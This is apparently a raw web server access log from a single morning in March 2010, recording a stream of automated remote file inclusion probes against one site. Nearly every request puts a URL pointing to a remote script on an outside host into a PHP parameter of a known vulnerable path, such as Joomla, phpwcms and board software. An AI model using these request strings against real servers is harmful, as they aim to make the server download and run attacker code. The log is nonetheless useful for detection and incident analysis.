87.106.65.116 - - [04/Mar/2010:07:25:44 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:25:45 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:26:06 -0800] "GET /logs/access_100129.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:26:41 -0800] "GET /logs/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:26:41 -0800] "GET /logs/access_100130.log%20%20/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:26:41 -0800] "GET /index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:27:09 -0800] "GET /logs/access_100206.log%20%20/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:27:25 -0800] "GET /logs/access_100208.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:27:43 -0800] "GET /index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:27:46 -0800] "GET /logs/access_100130.log%20%20/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:27:46 -0800] "GET /logs/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:28:15 -0800] "GET /logs/access_100206.log%20%20/index2.php?ascii_seite=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:07:28:44 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:29:41 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:29:41 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:29:41 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:29:50 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:29:50 -0800] "GET /logs/access_100202.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:29:50 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:29:53 -0800] "GET /logs/access_100212.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:12 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:12 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:12 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:07:30:50 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:57 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:57 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:30:57 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:31:00 -0800] "GET ///admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:31:00 -0800] "GET /logs////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:31:00 -0800] "GET /logs/access_100212.log%20%20////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:31:27 -0800] "GET /logs/access_100212.log////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:31:39 -0800] "GET /logs/access_100206.log%20%20//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:31:39 -0800] "GET /write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:31:39 -0800] "GET /logs//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:31:47 -0800] "GET /logs/access_100206.log//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:31:49 -0800] "GET /logs/access_100221.log//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:32:00 -0800] "GET /logs/access_100206.log%20%20//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:32:00 -0800] "GET /write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:32:00 -0800] "GET /logs//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:32:05 -0800] "GET /logs/access_100225.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:32:06 -0800] "GET /index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:32:06 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:32:23 -0800] "GET /logs/access_100126.log%20%20//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:32:27 -0800] "GET /logs/access_100206.log/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:07:32:39 -0800] "GET /logs/access_100126.log%20%20//write_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:32:40 -0800] "GET /logs/access_100224.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:06 -0800] "GET /logs/access_100226.log////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:06 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:33:06 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:07 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:11 -0800] "GET /logs/access_100226.log////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:11 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:33:11 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:33:28 -0800] "GET /logs/access_100128.log%20%20//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:33:28 -0800] "GET /errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:33:28 -0800] "GET /logs//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:33:34 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:34:06 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:34:32 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:02 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:02 -0800] "GET /logs/access_100201.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:02 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:05 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:05 -0800] "GET /logs/access_100201.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:35:05 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:35:51 -0800] "GET /administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:35:51 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:35:51 -0800] "GET /logs//administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:36:13 -0800] "GET /logs/access_100126.log//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:36:43 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:36:43 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:36:44 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:07:36:49 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:07:36:51 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:07:36:52 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:38:07 -0800] "GET /logs/access_100213.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:38:25 -0800] "GET /atom.php5?page=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:38:25 -0800] "GET /logs/access_100202.log%20%20//atom.php5?page=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:38:25 -0800] "GET /logs//atom.php5?page=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:38:55 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:41:18 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:41:18 -0800] "GET /logs//administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:41:18 -0800] "GET /administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:41:45 -0800] "GET /logs/access_100128.log//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:41:45 -0800] "GET /logs/access_100208.log//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:07:42:26 -0800] "GET /logs/access_100221.log%20%20//administrator/components/com_chronocontact/delete_all.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:42:41 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:42:41 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:42:41 -0800] "GET /logs/access_100202.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:07:43:00 -0800] "GET /logs/access_100212.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:43:12 -0800] "GET /logs/bad_link.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:43:23 -0800] "GET /logs/access_100226.log%20%20//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:43:23 -0800] "GET /logs//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:43:23 -0800] "GET /errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:43:38 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:43:54 -0800] "GET /logs/access_100201.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:43:55 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:43:55 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:43:57 -0800] "GET /logs/access_100215.log%20%20//errors.php?error=http://legalo.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:44:32 -0800] "GET /logs/access_100201.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:44:32 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:07:44:33 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://deddie.com/byz9991.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:40 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:41 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:41 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:45 -0800] "GET /SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:45 -0800] "GET /logs/access_100215.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:45 -0800] "GET /logs//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:46 -0800] "GET /SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:46 -0800] "GET /logs/access_100215.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:44:46 -0800] "GET /logs//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:46 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:47 -0800] "GET /become_editor.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:44:47 -0800] "GET /logs/become_editor.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:45:09 -0800] "GET /SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:45:09 -0800] "GET /logs/access_100215.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:45:09 -0800] "GET /logs//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:45:11 -0800] "GET /logs/access_100201.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:07:45:22 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
